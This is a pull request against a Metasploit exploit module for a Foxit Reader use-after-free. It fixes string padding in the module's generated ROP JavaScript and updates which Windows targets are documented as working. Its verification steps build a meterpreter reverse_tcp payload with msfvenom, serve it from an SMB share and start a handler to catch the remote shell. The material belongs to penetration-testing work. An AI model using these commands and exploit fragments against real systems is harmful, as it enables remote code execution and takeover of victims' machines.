### PR TITLE
Update doc, fix generated strings

### DIFF
--- a/documentation/modules/exploit/windows/fileformat/foxit_reader_uaf.md
+++ b/documentation/modules/exploit/windows/fileformat/foxit_reader_uaf.md
@@ -1,6 +1,6 @@
 ## Description
 
-Foxit Reader v9.0.1.1049 and earlier are affected by use-after-free and uninitialzed memory vulnerabilities that can be used to gain code execution. This module uses Uint32Array uninitialized memory and text annotation use-after-free vulnerabilities to call WinExec with a share file path to download and execute the specified exe. The module has been tested against Foxit Reader v9.0.1.1049 running on Windows 10 Pro x64 Build 17134.
+Foxit Reader v9.0.1.1049 and earlier are affected by use-after-free and uninitialzed memory vulnerabilities that can be used to gain code execution. This module uses Uint32Array uninitialized memory and text annotation use-after-free vulnerabilities to call WinExec with a share file path to download and execute the specified exe. The module has been tested against Foxit Reader v9.0.1.1049 running on Windows 7 x64 and Windows 10 Pro x64 Build 17134. The module also works against Windows 10 Enterprise with insecure logons enabled.
 
 ## Vulnerable Application
 

--- a/documentation/modules/exploit/windows/fileformat/foxit_reader_uaf.md
+++ b/documentation/modules/exploit/windows/fileformat/foxit_reader_uaf.md
@@ -1,6 +1,6 @@
 ## Description
 
-Foxit Reader v9.0.1.1049 and earlier are affected by use-after-free and uninitialzed memory vulnerabilities that can be used to gain code execution. This module uses Uint32Array uninitialized memory and text annotation use-after-free vulnerabilities to call WinExec with a share file path to download and execute the specified exe. The module has been tested against Foxit Reader v9.0.1.1049 running on Windows 7 x64 and Windows 10 Pro x64 Build 17134. The module also works against Windows 10 Enterprise with insecure logons enabled.
+Foxit Reader v9.0.1.1049 and earlier are affected by use-after-free and uninitialzed memory vulnerabilities that can be used to gain code execution. This module uses Uint32Array uninitialized memory and text annotation use-after-free vulnerabilities to call WinExec with a share file path to download and execute the specified exe. The module has been tested against Foxit Reader v9.0.1.1049 running on Windows 7 x64 and Windows 10 Pro x64 Build 17134. Later builds of Windows 10 Pro x64 may need insecure logons enabled for the module to work.
 
 ## Vulnerable Application
 

--- a/documentation/modules/exploit/windows/fileformat/foxit_reader_uaf.md
+++ b/documentation/modules/exploit/windows/fileformat/foxit_reader_uaf.md
@@ -1,6 +1,6 @@
 ## Description
 
-Foxit Reader v9.0.1.1049 and earlier are affected by use-after-free and uninitialzed memory vulnerabilities that can be used to gain code execution. This module uses Uint32Array uninitialized memory and text annotation use-after-free vulnerabilities to call WinExec with a share file path to download and execute the specified exe. The module has been tested against Foxit Reader v9.0.1.1049 running on Windows 7 x64 and Windows 10 Pro x64 Build 17134. Later builds of Windows 10 Pro x64 may need insecure logons enabled for the module to work.
+Foxit Reader v9.0.1.1049 and earlier are affected by use-after-free and uninitialzed memory vulnerabilities that can be used to gain code execution. This module uses Uint32Array uninitialized memory and text annotation use-after-free vulnerabilities to call WinExec with a share file path to download and execute the specified exe. The module has been tested against Foxit Reader v9.0.1.1049 running on Windows 7 x64 and Windows 10 Pro x64 Build 17134. Windows 10 Enterprise needs to have [insecure logons enabled](https://support.microsoft.com/en-ca/help/4046019) for the exploit to work as expected.
 
 ## Vulnerable Application
 

--- a/modules/exploits/windows/fileformat/foxit_reader_uaf.rb
+++ b/modules/exploits/windows/fileformat/foxit_reader_uaf.rb
@@ -65,6 +65,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     share_path = "\\\\#{datastore['LHOST']}\\#{share}\\#{fname}"
     num = 4 - (share_path.length % 4)
+    num = 0 if num == 4
     share_path << "\x00"*num
     return nil if share_path.length > 44
 
@@ -73,11 +74,11 @@ class MetasploitModule < Msf::Exploit::Remote
     rop = ''
     max_index = 0
     share_path.unpack('V*').each_with_index {|blk, index|
-      rop << "\nrop[0x%02x] = 0x%08x" % [index+12, blk]
+      rop << "\nrop[0x%02x] = 0x%08x;" % [index+12, blk]
       max_index = index
     }
 
-    (max_index+1).upto(10) {|i| rop << "\nrop[0x%02x] = 0x00000000" % (i+12)}
+    (max_index+1).upto(10) {|i| rop << "\nrop[0x%02x] = 0x00000000;" % (i+12)}
 
     <<~PDFDOC
 %PDF

--- a/modules/exploits/windows/fileformat/foxit_reader_uaf.rb
+++ b/modules/exploits/windows/fileformat/foxit_reader_uaf.rb
@@ -20,6 +20,10 @@ class MetasploitModule < Msf::Exploit::Remote
         which can be adjusted to point to the base address of the executable.
         A ROP chain can be constructed that will execute when Foxit Reader
         performs the UAF.
+
+        This module has been tested on Windows 7 x64, Windows 10 Pro x64
+        Build 17134, and Windows 10 Enterprise x64. Windows 10 Enterprise
+        must have insecure logons enabled for the exploit to work as expected.
       },
       'License' => MSF_LICENSE,
       'Author' =>


### PR DESCRIPTION
~~Adjust target name, although it doesn't make a difference when generating the pdf, win10 needs to have insecure guest logons enabled for the system to connect to an anonymous share. Changing target name to adjust expectations.~~

Windows 10 Pro x64 Build 17134 works without insecure logons enabled but later builds may need insecure logons enabled for the module to work properly.

[Windows 10 Enterprise would need guest logons enabled](https://support.microsoft.com/en-ca/help/4046019) for the module to work properly.

This PR updates the documentation and fixes the generated strings.

## Verification Steps

- [x] `./msfvenom -p windows/meterpreter/reverse_tcp LHOST=<lhost> LPORT=<lport> --arch x86 -f exe -o /share/path/tmp.exe`
- [x] `chmod 777 /share/path/tmp.exe`
- [x] `./msfconsole -qx 'use exploit/windows/fileformat/foxit_reader_uaf ; set exename tmp.exe ; set share <share> ; set lhost <lhost> ; run'`
- [x] `use multi/handler`
- [x] `set payload windows/meterpreter/reverse_tcp`
- [x] `set lhost <lhost>`
- [x] `run -j`
- [x] Copy pdf over to target. Start Foxit Reader then open pdf from Foxit's Menu.